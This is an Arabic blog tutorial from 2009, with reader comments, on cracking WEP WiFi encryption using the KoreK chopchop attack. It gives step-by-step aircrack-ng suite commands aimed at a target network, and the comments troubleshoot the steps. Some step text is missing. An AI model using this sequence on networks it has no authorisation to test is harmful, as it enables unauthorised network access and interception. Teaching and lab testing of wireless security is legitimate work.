| فيديو: WEP korek chopchop attack |
| الكاتب زيد القريشي |
| الخميس, 18 يونيو 2009 14:51 |
|
تحدثنا سابقا عن فك تشفير WEP دون الحاجة الى لوجود أي جهاز (client) متصل بالشبكة الهدف باستخدام fake authentication attack أما اليوم فسنستخدم طريفة اخرى تدعى korek chopchop attack لكسر تشفير شبكة وايرلس تستخدم تشفير WEP في أقل من 10 دقائق.
ملاحظة: الشرح من توزيعة backtrack3 ويمكن تطبيقه من أي توزيعة لينكس اخرى بعد تثبيت حزمة aircrack-ng. الفيديو للغرض التعليمي فقط و أنا غير مسؤول عن أي استخدام خاطئ للمعلومات المذكورة في الشرح الفيديو:الخطوات:
حيث: interface هو اسم كرت الوايرلس الخاص بك.
2. استخدام برنامج airodump-ng لمشاهدة الشبكات المتوفرة بتنفيذ الأمر: airodump-ng [interface]
3. تشغيل برنامج airodump-ng لجمع الحزم من الشبكة الهدف airodump-ng -c [channel] --bssid [target BSSID] -w out [interface]حيث:
4. عمل fake authentication للـ AP الخاص بنا على الشبكة الهدف حتى نستطيع تنفيذ chopchop attack في الخطوة القادمة توضيح: اذا قمنا بنفيذ chopchop attack مباشرة دون القيام بهذه الخطوة فان الشبكة الهدف ستقوم بارسال حزم deauthentication و بالتالي سيفشل الهجوم و لذلك سنقوم بعمل fake authentication (تصريح مزيف) لجهازنا لنتمكن من تنفيذ chopchop attack حيث: حيث: target essid اسم الشبكة الهدف
5. استخدام برنامج aireplay-ng للبدء بالـ chopchop attack aireplay-ng -4 -b [target BSSID] -h [source MAC address (your MAC)] [interface]
6. استخدام برنامج packetforge لتكوين حزمة arp التي سوف نحقنها في الشبكة الهدف packetforge-ng -0 -a [target BSSID] -h [source MAC] -k [destination IP in fragments] -l [source IP in fragments] -y arp.xor -w [output2]
7. حقن الحزمة المكونة في الخطوة 6 باستخدام برنامج aireplay-ng aireplay-ng -2 -r [output2] [interface]حيث: r- الحزمة المكونة في الخطوة السابقة
8. فك التشفير بالستخدام برنامج aircrack-ng aircrack-ng [file]حيث: file الملف الذي تم تخزين الحزم فية من الخطوة 3
التعليقات (11)
  أرسلت بواسطة: عبدالمهيمن في June 22, 2009
كما عودتنا شرح رائع وجميل :)
شكرا زيد وبانتظار المزيد من الشروحات والمواضيع عن الـ Wireless Hacking :P
 أرسلت بواسطة: ICEMAN في June 24, 2009
مشكور على الشرح
بس في البداية نسيت [airmon-ng stop [interface قبل النقطة رقم 1 ومشكور للامام
 أرسلت بواسطة: Zaid في June 24, 2009
Mustafa Albazy:شكرا على مرورك,طبعا فكرت باضافة صوت للفيديو لكنني ترددت ربما في المستقبل.
عبد المهيمن:منور الموضوع و شكرا على التشجيع ICEMAN:الامر airmin-ng stop [interface] يستخدم لايقاف كارد تم وضعه في الـmonitor mod مسبفا اما بالنسبة لي فلم بكن الكارد الخاص بي في الـMonitor mod لذك قمت بوضعه في المونيتور مود
 أرسلت بواسطة: a.j في September 02, 2009
السلام عليكم
مشكور على الشرح الرائع بس البرنامج عندي يبقى يجمع حزم حيث يبقى يجمع حزم ولا تظهر لي رسالة do you want to use these packets ? يستمر بجمع الحزم فقط ولمدة طويلة حل يوجد حل ؟ او ما هي المشكلة بالضبط ؟
 أرسلت بواسطة: مهند في September 07, 2009
اخي زيد رحمه الله والديك على الشرح
عندي سؤال بالنسبة للخطوة packetforge-ng -0 -a [target BSSID] -h [source MAC] -k [destination IP in fragments] -l [source IP in fragments] -y arp.xor -w [output2] شنو هذا الرقم الي وضعته 255.255.255.255 destination IP in fragments والرقم الي بعده ايضا 255.255.255.255.255 source IP in fragments انا لدي فقط subnetmask وهو 255.255.255.0 وشكرا لك وصيام مقبول ان شاء الله
أرسلت بواسطة: مهند في September 07, 2009
اخي الكريم سؤال ثاني انا طبقت على شبكتين الاولى ظهر لي في بداية الامر مشكلة في عدم نجاح عملية chopchop attack في الخطوة 5 ولكن عند تكراراها نحجت وظهر لي المفتاح
على شكل 78:03:15:18:25 هل هذا هو الكي صحيح ؟ والشبكة الثانية المشكلة في Essid اقواس مثلاً isecur1ty (h) 07756451 عند تطبيق الخطوة رقم 4 عمل fake authentication يظهر لي خطأ وهو bash:syntax error near unexpexted token '(' what this problem - وان شاء الله ماسويت عليك زحمة موفق ان شاء الله
أرسلت بواسطة: Zaid في September 09, 2009
a.j:جرب اعادة الخطوة 4 اثناء عملية جمع الحزم
مهند:لا النت ماسك غير و نعم هذا هو المفتاح الصحيح اما بالنسبة لاسم الشبكة اذا احتوى على فراغات فيجب وضعه في علامات تنصيص "" و ليس داخل اقواس مثال: "network essid"
 أرسلت بواسطة: bandr في November 22, 2009
يطلع خطا
Command 'aireplay-ng' is available in '/usr/sbin/aireplay-ng' The command could not be located because '/usr/sbin' is not included in the PATH environment variable. This is most likely caused by the lack of administrative priviledges associated with your user account. bash: aireplay-ng: command not found ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
 أرسلت بواسطة: مصعب55 في December 01, 2009
السلام عليكم اخي العزيز انا اهنئك على هذا الموقع والله يوفقك بس انا عندي سؤال بسيط واتمنى ما تبخل علي باإجابة
انا عندي وايرلس wusb54gc rt73 واسوي بحث ولكن هل احتاج الى تحديث الوايرلس مثل هذه الروابط مع العلم انا اريد فقط اختراق wep bt ~ # wget http://homepages.tu-darmstadt.....1.tar.bz2 bt ~ # wget http://www.offensive-security.com/kernel.lzm واتمنى اخوي تجاوبني على السؤال واكون مشكور
أضف تعليق
يجب عليك الاشتراك بالموقع لتتمكن من كتابة التعليقات, الاشتراك مجاني ويستغرق بضع ثوان فقط!
اذا كنت مشترك مسبقا في الموقع فضلاً قم بتسجيل الدخول. |
شرح جميل الصراحة ولكن ينقصة الصوت, لو كان مع الصوت لكان اسهل للمبتدئين.